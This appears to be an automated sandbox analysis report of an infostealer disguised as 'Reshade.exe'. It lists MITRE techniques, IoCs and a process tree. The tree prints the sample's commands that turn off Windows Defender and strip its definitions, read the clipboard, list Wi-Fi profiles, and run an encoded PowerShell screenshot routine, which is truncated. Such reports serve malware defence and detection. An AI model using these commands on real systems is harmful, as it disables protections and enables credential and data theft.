c8b923b5395e23831c6e3c6d4e62811c4466fc89cb7547d779986969a6189137

Analysis

max time kernel
149s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-de
resource tags

arch:x64arch:x86image:win10v2004-20241007-delocale:de-deos:windows10-2004-x64systemwindows
submitted
24/11/2024, 03:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Reshade.exe
Size

6.0MB
MD5

748ae97b3d8db204a27e6949cc6c5038
SHA1

c2fcbb04f3d55e497d618f03f0c70b436f372306
SHA256

c8b923b5395e23831c6e3c6d4e62811c4466fc89cb7547d779986969a6189137
SHA512

722f66f43cd1c25a70e87ad7da5e020d6797612f4293987565a1b3621ac8a9ac67cce6c12320651444f3485cb7d0d0eea933663f79b8061b51bf0031afde0409
SSDEEP

98304:MHIu4+Dc0dprjamaHl3Ne4i3gDUZnhhM7M+yvFaW9cIzaF6ARwDtyDe2HQMbm3Uu:Mop+DXMeNoInY7/sHfbRy9LbmW7Te

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4880	powershell.exe
3148	powershell.exe
3652	powershell.exe
4060	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1580	cmd.exe
4904	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1376	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3840	Reshade.exe
3840	Reshade.exe
3840	Reshade.exe
3840	Reshade.exe
3840	Reshade.exe
3840	Reshade.exe
3840	Reshade.exe
3840	Reshade.exe
3840	Reshade.exe
3840	Reshade.exe
3840	Reshade.exe
3840	Reshade.exe
3840	Reshade.exe
3840	Reshade.exe
3840	Reshade.exe
3840	Reshade.exe
3840	Reshade.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
19	discord.com
20	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
4324	tasklist.exe
4868	tasklist.exe
4500	tasklist.exe

UPX packed file 62 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b8b-21.dat	upx
behavioral2/memory/3840-25-0x00007FFDE4E60000-0x00007FFDE52CE000-memory.dmp	upx
behavioral2/files/0x000a000000023b7e-27.dat	upx
behavioral2/memory/3840-48-0x00007FFDFBA10000-0x00007FFDFBA1F000-memory.dmp	upx
behavioral2/files/0x000a000000023b85-47.dat	upx
behavioral2/files/0x000a000000023b84-46.dat	upx
behavioral2/files/0x000a000000023b83-45.dat	upx
behavioral2/files/0x000a000000023b82-44.dat	upx
behavioral2/files/0x0031000000023b81-43.dat	upx
behavioral2/files/0x0031000000023b80-42.dat	upx
behavioral2/files/0x0031000000023b7f-41.dat	upx
behavioral2/files/0x000a000000023b7d-40.dat	upx
behavioral2/files/0x000a000000023b90-39.dat	upx
behavioral2/files/0x000a000000023b8f-38.dat	upx
behavioral2/files/0x000a000000023b8e-37.dat	upx
behavioral2/files/0x000a000000023b8a-34.dat	upx
behavioral2/files/0x000a000000023b88-33.dat	upx
behavioral2/memory/3840-30-0x00007FFDF9680000-0x00007FFDF96A4000-memory.dmp	upx
behavioral2/files/0x000a000000023b89-29.dat	upx
behavioral2/memory/3840-54-0x00007FFDF8640000-0x00007FFDF866D000-memory.dmp	upx
behavioral2/memory/3840-56-0x00007FFDFB170000-0x00007FFDFB189000-memory.dmp	upx
behavioral2/memory/3840-58-0x00007FFDF9850000-0x00007FFDF986F000-memory.dmp	upx
behavioral2/memory/3840-60-0x00007FFDE4CF0000-0x00007FFDE4E59000-memory.dmp	upx
behavioral2/memory/3840-62-0x00007FFDF8620000-0x00007FFDF8639000-memory.dmp	upx
behavioral2/memory/3840-64-0x00007FFDFB3A0000-0x00007FFDFB3AD000-memory.dmp	upx
behavioral2/memory/3840-66-0x00007FFDF3E10000-0x00007FFDF3E3E000-memory.dmp	upx
behavioral2/memory/3840-71-0x00007FFDF3270000-0x00007FFDF3328000-memory.dmp	upx
behavioral2/memory/3840-70-0x00007FFDE4E60000-0x00007FFDE52CE000-memory.dmp	upx
behavioral2/memory/3840-74-0x00007FFDF9680000-0x00007FFDF96A4000-memory.dmp	upx
behavioral2/memory/3840-73-0x00007FFDE4970000-0x00007FFDE4CE5000-memory.dmp	upx
behavioral2/memory/3840-79-0x00007FFDF9670000-0x00007FFDF967D000-memory.dmp	upx
behavioral2/memory/3840-78-0x00007FFDF8640000-0x00007FFDF866D000-memory.dmp	upx
behavioral2/memory/3840-76-0x00007FFDF3770000-0x00007FFDF3784000-memory.dmp	upx
behavioral2/memory/3840-81-0x00007FFDFB170000-0x00007FFDFB189000-memory.dmp	upx
behavioral2/memory/3840-82-0x00007FFDE4850000-0x00007FFDE4968000-memory.dmp	upx
behavioral2/memory/3840-83-0x00007FFDF9850000-0x00007FFDF986F000-memory.dmp	upx
behavioral2/memory/3840-109-0x00007FFDE4CF0000-0x00007FFDE4E59000-memory.dmp	upx
behavioral2/memory/3840-176-0x00007FFDF8620000-0x00007FFDF8639000-memory.dmp	upx
behavioral2/memory/3840-230-0x00007FFDFB3A0000-0x00007FFDFB3AD000-memory.dmp	upx
behavioral2/memory/3840-276-0x00007FFDF3E10000-0x00007FFDF3E3E000-memory.dmp	upx
behavioral2/memory/3840-280-0x00007FFDF3270000-0x00007FFDF3328000-memory.dmp	upx
behavioral2/memory/3840-282-0x00007FFDE4970000-0x00007FFDE4CE5000-memory.dmp	upx
behavioral2/memory/3840-303-0x00007FFDE4850000-0x00007FFDE4968000-memory.dmp	upx
behavioral2/memory/3840-310-0x00007FFDE4CF0000-0x00007FFDE4E59000-memory.dmp	upx
behavioral2/memory/3840-309-0x00007FFDF9850000-0x00007FFDF986F000-memory.dmp	upx
behavioral2/memory/3840-305-0x00007FFDF9680000-0x00007FFDF96A4000-memory.dmp	upx
behavioral2/memory/3840-304-0x00007FFDE4E60000-0x00007FFDE52CE000-memory.dmp	upx
behavioral2/memory/3840-344-0x00007FFDF3770000-0x00007FFDF3784000-memory.dmp	upx
behavioral2/memory/3840-346-0x00007FFDE4850000-0x00007FFDE4968000-memory.dmp	upx
behavioral2/memory/3840-345-0x00007FFDF9670000-0x00007FFDF967D000-memory.dmp	upx
behavioral2/memory/3840-343-0x00007FFDF3270000-0x00007FFDF3328000-memory.dmp	upx
behavioral2/memory/3840-342-0x00007FFDF3E10000-0x00007FFDF3E3E000-memory.dmp	upx
behavioral2/memory/3840-341-0x00007FFDF8620000-0x00007FFDF8639000-memory.dmp	upx
behavioral2/memory/3840-340-0x00007FFDE4CF0000-0x00007FFDE4E59000-memory.dmp	upx
behavioral2/memory/3840-339-0x00007FFDF9850000-0x00007FFDF986F000-memory.dmp	upx
behavioral2/memory/3840-338-0x00007FFDFB170000-0x00007FFDFB189000-memory.dmp	upx
behavioral2/memory/3840-337-0x00007FFDF8640000-0x00007FFDF866D000-memory.dmp	upx
behavioral2/memory/3840-336-0x00007FFDFBA10000-0x00007FFDFBA1F000-memory.dmp	upx
behavioral2/memory/3840-335-0x00007FFDF9680000-0x00007FFDF96A4000-memory.dmp	upx
behavioral2/memory/3840-334-0x00007FFDFB3A0000-0x00007FFDFB3AD000-memory.dmp	upx
behavioral2/memory/3840-330-0x00007FFDE4970000-0x00007FFDE4CE5000-memory.dmp	upx
behavioral2/memory/3840-319-0x00007FFDE4E60000-0x00007FFDE52CE000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
952	cmd.exe
1404	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1164	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1264	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133768923218524987"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3756129449-3121373848-4276368241-1000\{81E927B3-2B61-4C90-B989-83ECB8D08E80}	chrome.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3148	powershell.exe
4880	powershell.exe
3148	powershell.exe
4880	powershell.exe
4904	powershell.exe
4904	powershell.exe
4904	powershell.exe
2932	powershell.exe
2932	powershell.exe
2932	powershell.exe
3652	powershell.exe
3652	powershell.exe
3028	powershell.exe
3028	powershell.exe
4060	powershell.exe
4060	powershell.exe
1100	powershell.exe
1100	powershell.exe
4832	chrome.exe
4832	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3148	powershell.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeDebugPrivilege	4324	tasklist.exe
Token: SeDebugPrivilege	4500	tasklist.exe
Token: SeDebugPrivilege	4868	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2028	WMIC.exe
Token: SeSecurityPrivilege	2028	WMIC.exe
Token: SeTakeOwnershipPrivilege	2028	WMIC.exe
Token: SeLoadDriverPrivilege	2028	WMIC.exe
Token: SeSystemProfilePrivilege	2028	WMIC.exe
Token: SeSystemtimePrivilege	2028	WMIC.exe
Token: SeProfSingleProcessPrivilege	2028	WMIC.exe
Token: SeIncBasePriorityPrivilege	2028	WMIC.exe
Token: SeCreatePagefilePrivilege	2028	WMIC.exe
Token: SeBackupPrivilege	2028	WMIC.exe
Token: SeRestorePrivilege	2028	WMIC.exe
Token: SeShutdownPrivilege	2028	WMIC.exe
Token: SeDebugPrivilege	2028	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2028	WMIC.exe
Token: SeRemoteShutdownPrivilege	2028	WMIC.exe
Token: SeUndockPrivilege	2028	WMIC.exe
Token: SeManageVolumePrivilege	2028	WMIC.exe
Token: 33	2028	WMIC.exe
Token: 34	2028	WMIC.exe
Token: 35	2028	WMIC.exe
Token: 36	2028	WMIC.exe
Token: SeDebugPrivilege	4904	powershell.exe
Token: SeIncreaseQuotaPrivilege	2028	WMIC.exe
Token: SeSecurityPrivilege	2028	WMIC.exe
Token: SeTakeOwnershipPrivilege	2028	WMIC.exe
Token: SeLoadDriverPrivilege	2028	WMIC.exe
Token: SeSystemProfilePrivilege	2028	WMIC.exe
Token: SeSystemtimePrivilege	2028	WMIC.exe
Token: SeProfSingleProcessPrivilege	2028	WMIC.exe
Token: SeIncBasePriorityPrivilege	2028	WMIC.exe
Token: SeCreatePagefilePrivilege	2028	WMIC.exe
Token: SeBackupPrivilege	2028	WMIC.exe
Token: SeRestorePrivilege	2028	WMIC.exe
Token: SeShutdownPrivilege	2028	WMIC.exe
Token: SeDebugPrivilege	2028	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2028	WMIC.exe
Token: SeRemoteShutdownPrivilege	2028	WMIC.exe
Token: SeUndockPrivilege	2028	WMIC.exe
Token: SeManageVolumePrivilege	2028	WMIC.exe
Token: 33	2028	WMIC.exe
Token: 34	2028	WMIC.exe
Token: 35	2028	WMIC.exe
Token: 36	2028	WMIC.exe
Token: SeDebugPrivilege	2932	powershell.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeDebugPrivilege	3028	powershell.exe
Token: SeIncreaseQuotaPrivilege	736	WMIC.exe
Token: SeSecurityPrivilege	736	WMIC.exe
Token: SeTakeOwnershipPrivilege	736	WMIC.exe
Token: SeLoadDriverPrivilege	736	WMIC.exe
Token: SeSystemProfilePrivilege	736	WMIC.exe
Token: SeSystemtimePrivilege	736	WMIC.exe
Token: SeProfSingleProcessPrivilege	736	WMIC.exe
Token: SeIncBasePriorityPrivilege	736	WMIC.exe
Token: SeCreatePagefilePrivilege	736	WMIC.exe
Token: SeBackupPrivilege	736	WMIC.exe
Token: SeRestorePrivilege	736	WMIC.exe
Token: SeShutdownPrivilege	736	WMIC.exe
Token: SeDebugPrivilege	736	WMIC.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe
4832	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4840 wrote to memory of 3840	4840	Reshade.exe	82
PID 4840 wrote to memory of 3840	4840	Reshade.exe	82
PID 3840 wrote to memory of 1636	3840	Reshade.exe	83
PID 3840 wrote to memory of 1636	3840	Reshade.exe	83
PID 3840 wrote to memory of 4560	3840	Reshade.exe	85
PID 3840 wrote to memory of 4560	3840	Reshade.exe	85
PID 1636 wrote to memory of 4880	1636	cmd.exe	87
PID 1636 wrote to memory of 4880	1636	cmd.exe	87
PID 4560 wrote to memory of 3148	4560	cmd.exe	88
PID 4560 wrote to memory of 3148	4560	cmd.exe	88
PID 3840 wrote to memory of 2288	3840	Reshade.exe	89
PID 3840 wrote to memory of 2288	3840	Reshade.exe	89
PID 3840 wrote to memory of 3532	3840	Reshade.exe	91
PID 3840 wrote to memory of 3532	3840	Reshade.exe	91
PID 3840 wrote to memory of 1036	3840	Reshade.exe	94
PID 3840 wrote to memory of 1036	3840	Reshade.exe	94
PID 2288 wrote to memory of 4324	2288	cmd.exe	93
PID 2288 wrote to memory of 4324	2288	cmd.exe	93
PID 3840 wrote to memory of 1580	3840	Reshade.exe	95
PID 3840 wrote to memory of 1580	3840	Reshade.exe	95
PID 3840 wrote to memory of 4988	3840	Reshade.exe	97
PID 3840 wrote to memory of 4988	3840	Reshade.exe	97
PID 3532 wrote to memory of 4868	3532	cmd.exe	100
PID 3532 wrote to memory of 4868	3532	cmd.exe	100
PID 3840 wrote to memory of 1388	3840	Reshade.exe	101
PID 3840 wrote to memory of 1388	3840	Reshade.exe	101
PID 3840 wrote to memory of 952	3840	Reshade.exe	102
PID 3840 wrote to memory of 952	3840	Reshade.exe	102
PID 3840 wrote to memory of 4040	3840	Reshade.exe	104
PID 3840 wrote to memory of 4040	3840	Reshade.exe	104
PID 4988 wrote to memory of 4500	4988	cmd.exe	108
PID 4988 wrote to memory of 4500	4988	cmd.exe	108
PID 1036 wrote to memory of 2028	1036	cmd.exe	106
PID 1036 wrote to memory of 2028	1036	cmd.exe	106
PID 1580 wrote to memory of 4904	1580	cmd.exe	110
PID 1580 wrote to memory of 4904	1580	cmd.exe	110
PID 3840 wrote to memory of 2800	3840	Reshade.exe	111
PID 3840 wrote to memory of 2800	3840	Reshade.exe	111
PID 952 wrote to memory of 1404	952	cmd.exe	113
PID 952 wrote to memory of 1404	952	cmd.exe	113
PID 1388 wrote to memory of 1164	1388	cmd.exe	163
PID 1388 wrote to memory of 1164	1388	cmd.exe	163
PID 4040 wrote to memory of 1264	4040	cmd.exe	115
PID 4040 wrote to memory of 1264	4040	cmd.exe	115
PID 2800 wrote to memory of 2932	2800	cmd.exe	116
PID 2800 wrote to memory of 2932	2800	cmd.exe	116
PID 3840 wrote to memory of 3036	3840	Reshade.exe	117
PID 3840 wrote to memory of 3036	3840	Reshade.exe	117
PID 3036 wrote to memory of 2808	3036	cmd.exe	119
PID 3036 wrote to memory of 2808	3036	cmd.exe	119
PID 3840 wrote to memory of 3752	3840	Reshade.exe	120
PID 3840 wrote to memory of 3752	3840	Reshade.exe	120
PID 3752 wrote to memory of 2688	3752	cmd.exe	122
PID 3752 wrote to memory of 2688	3752	cmd.exe	122
PID 3840 wrote to memory of 3496	3840	Reshade.exe	123
PID 3840 wrote to memory of 3496	3840	Reshade.exe	123
PID 3496 wrote to memory of 3696	3496	cmd.exe	125
PID 3496 wrote to memory of 3696	3496	cmd.exe	125
PID 2932 wrote to memory of 4936	2932	powershell.exe	126
PID 2932 wrote to memory of 4936	2932	powershell.exe	126
PID 3840 wrote to memory of 1460	3840	Reshade.exe	127
PID 3840 wrote to memory of 1460	3840	Reshade.exe	127
PID 1460 wrote to memory of 4168	1460	cmd.exe	129
PID 1460 wrote to memory of 4168	1460	cmd.exe	129

C:\Users\Admin\AppData\Local\Temp\Reshade.exe
"C:\Users\Admin\AppData\Local\Temp\Reshade.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4840
- C:\Users\Admin\AppData\Local\Temp\Reshade.exe
  "C:\Users\Admin\AppData\Local\Temp\Reshade.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Reshade.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Reshade.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2288
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3532
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1036
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1580
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4988
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1388
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:952
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4040
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYw